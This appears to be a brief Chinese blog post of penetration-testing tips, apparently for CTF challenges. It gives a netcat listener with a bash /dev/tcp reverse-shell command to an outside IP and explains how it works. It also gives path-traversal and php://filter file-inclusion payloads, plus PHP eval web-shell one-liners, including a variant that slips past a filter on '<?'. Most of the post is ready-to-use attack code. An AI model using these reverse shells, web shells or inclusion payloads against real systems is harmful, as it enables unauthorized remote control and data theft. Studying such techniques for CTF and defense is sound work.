渗透常用技巧
目录
第一部分
1、shell反弹
在kali中监听对应端口
nc -lvvp 9999(对应端口)
在目标主机中写入反弹命令
bash -i >& /dev/tcp/192.168.199.129/9999 0>&1
反弹shell命令详解:
bash -i #bash是一个与sh兼容的命令解释程序,可以执行从标准输入或文件中读取的命令;-i参数表示shell将交互地执行
/dev/tcp/kali-ip/监听端口 #/dev/tcp/是linux中一个特殊设备,打开这个文件就相当于发出一个socket调用,建立一个socket连接,
读写这个文件就相当于在这个socket连接中传输数据
0>&1 #是对文件描述符的拷贝,是将0[标准输入]重定向到了1[标准输出]指向的位置
2、遇到文件包类型的题目,首先尝试文件穿越 (形如 ../文件名 ; ../ 个数不定)和 PHP伪协议(?变量=php://filter/read=convert.base64-encode/resource=文件名)
然后,再尝试其它方法
3、在上传php木马时,若是遇到对 <? 的过滤,则可以考虑用HTML标记php的形式写代码:
<script language="pHp">eval($_REQUEST['cmd']);</script>
等价于:
<?php @eval($_REQUEST[cmd])?>
浙公网安备 33010602011771号